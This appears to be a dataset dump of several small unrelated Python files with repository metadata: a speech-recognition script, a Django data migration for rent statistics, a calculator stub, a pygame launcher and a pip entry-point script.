9e0659a9c8417d64355d428583c81073548517ac
|
/Voice-Recognition/voice.py
|
8fa1d45660f562527f867c3eca67005b65cccab8
|
[] |
no_license
|
errpv78/Scene-Depiction
|
1304550efcd4b6db32c839cc0ff58745056cb694
|
078392901cf9c051116026dcfd905c50a7cceeb8
|
refs/heads/master
| 2023-01-08T07:32:13.924760
| 2020-11-17T04:40:29
| 2020-11-17T04:40:29
| 288,084,310
| 1
| 0
| null | 2020-11-02T10:34:53
| 2020-08-17T04:37:24
|
Jupyter Notebook
|
UTF-8
|
Python
| false
| false
| 415
|
py
|
# Using SpeechRecognition
from pynput.keyboard import Key, Controller
import speech_recognition as sr
r = sr.Recognizer()
keyboard = Controller()
# r.recognize_google()
mic = sr.Microphone()
with mic as source:
audio = r.listen(source)
try:
query = r.recognize_google(audio)
print(query)
keyboard.press(Key.space)
keyboard.release(Key.space)
except Exception as e:
print('Nothing')
pass
|
[
"parikhgoyal13@gmail.com"
] |
parikhgoyal13@gmail.com
|
87158830bce904828ce8e203db90dabce46c3f4c
|
248190817aaf1cc2c0bfc5a1344130c7027e86ce
|
/src/loyers/migrations/0006_auto_20160710_0721.py
|
ac86e849622f3c7a4cdfb97dbb868f012a223ace
|
[] |
no_license
|
ouhouhsami/loyer-api
|
9ec99e3506c766c99e3ec49f78509bf223b9ad9b
|
3345308f4c005ce2dd97e4264317ab44aaa8257b
|
refs/heads/master
| 2020-04-06T06:58:24.078949
| 2016-09-02T10:37:37
| 2016-09-02T10:37:37
| 63,017,827
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,309
|
py
|
# -*- coding: utf-8 -*-
# Generated by Django 1.9.7 on 2016-07-10 07:21
from __future__ import unicode_literals
from django.db import migrations
def transfer(apps, schema_editor):
Loyer = apps.get_model("loyers", "Loyer")
Observatory = apps.get_model("loyers", "Observatory")
Agglomeration = apps.get_model("loyers", "Agglomeration")
AgglomerationDescription = apps.get_model("loyers", "AgglomerationDescription")
HousingType = apps.get_model("loyers", "HousingType")
ConstructionPeriod = apps.get_model("loyers", "ConstructionPeriod")
RenterSeniority = apps.get_model("loyers", "RenterSeniority")
NumberOfRooms = apps.get_model("loyers", "NumberOfRooms")
ProductionMethodology = apps.get_model("loyers", "ProductionMethodology")
loyers = Loyer.objects.all()
for loyer in loyers:
# fix err data type conversion
if loyer.nombre_logements is '':
loyer.nombre_logements = None
if loyer.loyer_mensuel_1_decile is '':
loyer.loyer_mensuel_1_decile = None
if loyer.loyer_mensuel_1_quartile is '':
loyer.loyer_mensuel_1_quartile = None
if loyer.loyer_mensuel_median is '':
loyer.loyer_mensuel_median = None
if loyer.loyer_mensuel_3_quartile is '':
loyer.loyer_mensuel_3_quartile = None
if loyer.loyer_mensuel_9_decile is '':
loyer.loyer_mensuel_9_decile = None
if loyer.moyenne_loyer_mensuel is '':
loyer.moyenne_loyer_mensuel = None
if loyer.surface_moyenne is '':
loyer.surface_moyenne = None
if loyer.nombre_obsservations is '':
loyer.nombre_obsservations = None
if loyer.nombre_logements is '':
loyer.nombre_logements = None
if loyer.loyer_1_decile is '':
loyer.loyer_1_decile = None
if loyer.loyer_1_quartile is '':
loyer.loyer_1_quartile = None
if loyer.loyer_median is '':
loyer.loyer_median = None
if loyer.loyer_3_quartile is '':
loyer.loyer_3_quartile = None
if loyer.loyer_9_decile is '':
loyer.loyer_9_decile = None
if loyer.loyer_moyen is '':
loyer.loyer_moyen = None
# create fk
if loyer.Observatory is not '':
observatory, created = Observatory.objects.get_or_create(name=loyer.Observatory)
loyer.observatory_link = observatory
if loyer.agglomeration is not '':
agglomeration, created = Agglomeration.objects.get_or_create(name=loyer.agglomeration)
loyer.agglomeration_link = agglomeration
if loyer.Zone_complementaire is not '':
agglomeration_description, created = AgglomerationDescription.objects.get_or_create(name=loyer.Zone_complementaire)
loyer.agglomeration_description_link = agglomeration_description
if loyer.Type_habitat is not '':
housing_type, created = HousingType.objects.get_or_create(name=loyer.Type_habitat)
loyer.housing_type_link = housing_type
if loyer.epoque_construction_homogene is not '':
construction_period, created = ConstructionPeriod.objects.get_or_create(name=loyer.epoque_construction_homogene)
loyer.construction_period_link = construction_period
if loyer.anciennete_locataire_homogene is not '':
renter_seniority, created = RenterSeniority.objects.get_or_create(name=loyer.anciennete_locataire_homogene)
loyer.renter_seniority_link = renter_seniority
if loyer.nombre_pieces_homogene is not '':
number_of_rooms, created = NumberOfRooms.objects.get_or_create(name=loyer.nombre_pieces_homogene)
loyer.number_of_rooms_link = number_of_rooms
if loyer.methodologie_production is not '':
production_methodology, created = ProductionMethodology.objects.get_or_create(name=loyer.methodologie_production)
loyer.production_methodology_link = production_methodology
loyer.save()
def reverse_func(apps, schema_editor):
pass
class Migration(migrations.Migration):
dependencies = [
('loyers', '0005_auto_20160710_0720'),
]
operations = [
migrations.RunPython(transfer, reverse_func),
]
|
[
"samuel.goldszmidt@gmail.com"
] |
samuel.goldszmidt@gmail.com
|
c9df50cdb48d32427e35b390bad7889adff5d66c
|
d8e9b245973bd742d0c25e4cae76c7b0a9640ebe
|
/calc1.py
|
6adddb78ef7b2784e0f020f1178cea6be1147db7
|
[] |
no_license
|
Vikas1233321/Project1
|
245c851540a5ce51db82709a04e1aaf12a46b127
|
af9bcf78138c0d354cc6faba2ccc43b091209bec
|
refs/heads/master
| 2021-03-03T16:27:18.834633
| 2020-03-09T11:23:23
| 2020-03-09T11:23:23
| 245,973,417
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 102
|
py
|
def add(x, y):
"""add function"""
pass
def subtract(x, y):
"""Subtract Function"""
return x - y
|
[
"vi12@in.ibm.com"
] |
vi12@in.ibm.com
|
1d2ef80120f2a20c97ea62068f073c5fff3be405
|
00e1beb7980b2e9246433f7304a30624290a1670
|
/mediumlevel.py
|
e5ba3fc6a3f34acc6169d04cd43b68703e2965db
|
[] |
no_license
|
brettmcdowell/SimpleGame
|
13da4ad23a75d55a9889f7c43e5483d563068c7b
|
2d6d997d951a83a6abd929a7ffdd9548e90f6f00
|
refs/heads/main
| 2023-01-14T17:38:32.074649
| 2020-11-18T09:43:40
| 2020-11-18T09:43:40
| 312,881,813
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 344
|
py
|
import sys
import pygame
from player import Human_Player
from screen import Screen
from game import Game, HardGame
from main import play_game
if __name__ == "__main__":
pygame.init()
screen = Screen()
player = Human_Player(screen.width/2, screen.height-100)
game = HardGame(max_enemies=15)
play_game(screen, player, game)
|
[
"noreply@github.com"
] |
brettmcdowell.noreply@github.com
|
a80c321de193ab741a4881d2d2c49543455c03b1
|
1d30f51c4434d7ba90387d9caf838e590d87c991
|
/venv/bin/pip3
|
0339d8bfbd540e3888efe5a7b4fbbacee9a00ecc
|
[] |
no_license
|
eewig/parsing_zno
|
ce035be7c36c3670ce9d4ed715cc82e7fe6cfa24
|
c1bbff87bac6292905e909fdc174ee4e5a4ce1ab
|
refs/heads/master
| 2022-02-14T10:51:14.868560
| 2019-07-30T17:45:06
| 2019-07-30T17:45:06
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 405
|
#!/home/alex/PycharmProjects/parsing_zno/venv/bin/python
# EASY-INSTALL-ENTRY-SCRIPT: 'pip==19.0.3','console_scripts','pip3'
__requires__ = 'pip==19.0.3'
import re
import sys
from pkg_resources import load_entry_point
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(
load_entry_point('pip==19.0.3', 'console_scripts', 'pip3')()
)
|
[
"alosha.alosh@ukr.net"
] |
alosha.alosh@ukr.net
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.